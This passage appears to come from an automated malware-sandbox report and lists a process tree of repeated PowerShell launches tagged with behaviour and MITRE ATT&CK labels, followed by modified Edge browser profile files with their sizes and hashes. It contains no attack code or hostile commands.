    • Suspicious use of AdjustPrivilegeToken
    PID:7940
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8072
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:7256
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:7656
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8032
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:7908
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8236
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8372
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8496
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8632
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8760
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8896
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:9032
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:9168
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8012
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:8756
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:9140
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of AdjustPrivilegeToken
    PID:4580
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9272
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9408
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9540
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9680
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9808
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9936
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:10068
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:10200
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9508
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9908
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:9396
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:10340
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:10348
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo [ 100% "
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:7720
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:9392
                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:2068
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:2624

Network

MITRE ATT&CK Enterprise v16
Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize 2KB
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize 280B
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize 280B
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp
  Filesize 1B
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old
  Filesize 331B
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
  Filesize 44KB
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
  Filesize 520KB
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2
  Filesize 1.0MB
• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
  Filesize 8.0MB
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              5KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              f62195fefaa65c5acfcf944cf3b76108

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6baed5a04e3419c9be4582b74a4480590e4a3ad6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              d048490e60db3268bd04d75c3c4f8434fea474150fc1e987ae4f6cfd140143ab

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              46e89e42f8c918354e652499d3acc542f1a53bfdda3b6622845b40ad4f7cc07b1a2ee1363b2bac4453a01f69802fd3b37b448c09780b244515a5f400b8aa5bda

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              6961f0238adf896f44335ec3b85154cc

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              cca4fae83a557d557a5d88b1867608ac0662547e

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              622edd9eca35effa8f8e859401b1e14762038eb704fe8b5647366973fccd55c1

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              95def2b8dc34b4ce6343b30df594eba0fec989b0434b7d873dfd026869fa8d37a70cad76750360704d8eaf94fde00d2378939e0fcf29227fdc806e21c86bbb23

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57d4d4.TMP

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              a6ded319994831632738522e40f22561

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              1d28a0c4dc71fbea02d87f8678504dccd25aea99

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              6354905e6cf9a5559aa69ec9d939d38f071bc3ae7d25ba3d0ef5c374682eb4d8

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              636120a3ad1b53e64477e7dedf163a2b58636b8174520f2bbd79d4bd1547cd4ee9cc3d97075aaafa9ec7858f3bb574e1caca463fe383862a6805633292c57b46

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              20KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              d0eaa172f3bbf72652359b70b4ebf9f4

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b00788054f525e931158ac78f0ada17d6789d8f6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              5fae474698a5c75799e4f9f6e4a7fab926372d177904dbc4e4c4af4f036fc807

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              259b06dde9049b471b5e6b068fdd581e1b5fa757fec4a600fb5c7c933abed4f95dd0c5b941fd0dac7a30414c968297036c7eac1e92dec840ac07a701034f3624

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              264KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              b016a2a37b83156a43dc509712c9468a

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              a6ac6b50452acedffa2cb70936d4b6c19a1425a5

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              b3ef033b660d0a1a9344193497e8920d4a831d46ecfe73344bb8bea07ef94e64

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              121467315ac8d3b9dbf3495105fd69cb9b1c9c5b08e8d50c5fb6311afbee9d15b1b51cbb1b9329c0a211e5c088e942f70e990c08ccc0adb28eab9585e3c06fb8

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              224KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3cf3cbfee9d8cff26a4c0eca5bcf3be9

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              90df1446ade1d5f937d04cce1ccc6e92392bd650

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              1f0281dca0fbbcc2466d26d6601e2e8d098bfb3a476aea61fd957a8a12630859

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              7654b0392ecc0ee7b2d3fa24d802b3a34139947ed6c746561cb0803ac9b6df9e6fecb2c0d18a0d5d3549921fe197663fb358537dea57fdf504b656622d675760

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              108KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              06d55006c2dec078a94558b85ae01aef

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6a9b33e794b38153f67d433b30ac2a7cf66761e6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              9KB

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (14KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (9KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (2B)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (40B)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (19KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (24KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (19KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (36KB)

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG (338B)

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              347B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              1464f3d0dc3d4ccf0dd69d764502f0f7

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              089e24b41888bb17c293c3423b796234f69c5b90

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f4aa2bd531ea193b23fa841dff1f4de9038e58b4eec5d66bf28b2ee9cc31a17c

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1168493b8c8b7fafc4439e93926aeb1bb445df6e88b7ce01b1b8594c8e6908fe826b00dc7cb04ae247919dcdb02faa15718a2527775e11a117e283970ead9dca

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              326B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              ed236d6575f8011412f6351562b1b8b0

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              38c27e928ac95be7145c4dcdc2677bf9cdf7fc00

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              8079efb1a004df3ac4a9a669075a157f384039046d55f3ba940da47f440ebed2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              65ad571e3401702ea7859192e250a8183978790e79cba83885e93a37a126c107b3fd23ba96e97bda9721fff1319347bd9fb9e9fabe3b3967b9ab3a414e9729d1

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              22KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              ed9025915b4d450eb78e3f8a4194c10a

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              270f3b7b7d6e86f28124b10665f3761ce48076c1

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f096f01bfe6438965d0a9677ca8c000f4cd736ef8a9c74c5425f6808307b1332

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              4e4d61df1eb338799057461dd9fd256ee1ca84678629457d96f5dcabd7337acc4dcc9f93ca2085f41b5a41021c092c253d547af9e75420ed0df4ee9378a1115f

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              128KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              2fa8f38fc092da1f08851e0f43f21655

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b28f702cc5c141be03c5b90b5d9a19ec32ca669f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              522358b7bcfc84b165a51bffb00395fbcee4dffb7d91fd838273d4b2b1985e2b

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1aa08e61467d1b6630b42274c4144aa4bae7a7c65403f868b7f1bdeddae7822807f43d06ff62ace56a3870222519d279823bf9aa3cf9a39cf017fad735d94104

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              465B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              703f50ff899cd3158fb1eb485426316f

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              8ca19e27c521882065e4effbea01260a60ed216f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              21d77f1e260c43b896432db56a6a01672c722d1f2c9df657261d3bef0f91f5fb

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              b085ea0866bdc1d602c3c8fcbb8c2a1db072c636e8ebc29e2b0c8490691cb46500b03518e55edf98ad569cf6638ddfa88ecc4fc9b684ac25340fd51c330448ca

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              898B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c26d9900111e591c07216585169bc512

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              6b648672a7b3aaf67f321d6b76971f02914f4bdb

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              f575a05e567822525657b1f403334c1f678e243444583885a867a268c5135c6d

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              36227a84068cf1a8c85a0e75e625a8aa8c804d5424ced7dc23cc15117b746d871ffc618f749f0df317fee8592f4f75ed6899f49987e23ee77fa5652cfb2bd518

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              23KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              c1119eb3263ea787ebd59d8932d3a59d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              3fc9124fe21145152a35c08f47893d5e2c540032

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              49e076ec450b8f8f0fa26691457d218df6d1b4fff9220a5023cc91076ae2d7f1

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              11641d505b15446ae6670dfd8bbad8eb7edbd0bcdc342243c058bf0f4e872a84e4f74afec16be50874c3c1b9d36a2505f341196dea5b46c796f1b66b210428ea

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              22KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              3f8927c365639daa9b2c270898e3cf9d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c8da31c97c56671c910d28010f754319f1d90fa6

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              13B

  MD5     3e45022839c8def44fd96e24f29a9f4b
  SHA1    c798352b5a0860f8edfd5c1589cf6e5842c5c226
  SHA256  01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
